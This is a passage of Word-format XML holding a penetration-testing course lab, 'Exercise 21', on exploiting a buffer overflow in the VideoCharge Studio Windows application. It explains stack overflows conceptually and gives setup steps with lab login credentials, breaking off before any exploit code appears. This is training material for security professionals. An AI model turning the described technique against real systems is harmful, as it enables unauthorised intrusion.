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AFE40" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="007936"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Network Penetration Testing Methodology-Internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738BF1B" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="007936"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 34 Min Remaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67085130" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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Instructions Resources </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Help</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  100</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F8B3C" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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5369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>Exercise 21: Penetration Testing Buffer Overflow Vulnerability on a Windows Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662D4CBE" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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5369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E60DF4" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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In computer security and programming, a buffer overﬂow, or buffer overrun vulnerability appears where an application needs to read external information such as a character string, but the receiving buffer is relatively small compared to the possible size of the input string, and the application doesn't check the size. The buffer allocated at run-time is placed on a stack, which keeps the information for executing functions, such as local variables, argument variables, and the return address. The overﬂowing string can alter such information. This also means that an attacker can change the information as he or she wants to. For example, the attacker can inject a series of machine language commands such as a string that also leads to the execution of the attack code by changing the return address to the address of the attack code. The ultimate goal is usually to get control of a privileged shell by such methods.</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">As a penetration tester, you must be able to understand the concept of buffer overflow vulnerabilities and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> them.</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">In this lab, you are going to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> a buffer overflow vulnerability on a windows application and gain access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB25049" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">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5369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Lab Duration</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BEEA19" w14:textId="707EDD57"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26A6CB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20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId8" w:name="DefaultOcxName" w:shapeid="_x0000_i1149"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab is a part of white box </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, where you are informed that there is an application named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VideoCharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Studio installed on a system. In this lab, we are going to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> buffer overflow vulnerability present in this application. So, before beginning this lab, we are going to install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VideoCharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Studio in the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sales Department</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine (Windows 10). Select </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sales Department</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pane and log in to it using the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Admin/test@123</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Once you login to the machine, if a Network banner appears at the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>right side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> corner of the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C277203" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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You can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type Password</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> option from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> menu to enter the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DA805" w14:textId="2AB7B486"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67DF2958" wp14:editId="0E77F326">
            <wp:extent cx="5400040" cy="4048125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1094965551"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E3393DE" w14:textId="1EC7C812"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7741FBD8">
          <v:shape id="_x0000_i1148" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId10" w:name="DefaultOcxName1" w:shapeid="_x0000_i1148"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">To install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VideoCharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Studio, navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\\172.19.19.20\e\CPENT Module 06 Network Penetration Testing Methodology-Internal\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VideoCharge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Studio</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and double-click on </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VideoChargeStudio_Install.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to install the tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBC937F" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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If a </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>User Account Control</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> pop-up window appears, click </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7365E7" w14:textId="77777777" w:rsidR="005369DA" w:rsidRPr="005369DA" w:rsidRDefault="005369DA" w:rsidP="005369DA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>
        <w:spacing w:before="100" w:before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If a </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows Security</w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> pop-up appears to access </w:t>
      </w:r>
      <w:r w:rsidRPr="005369DA">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
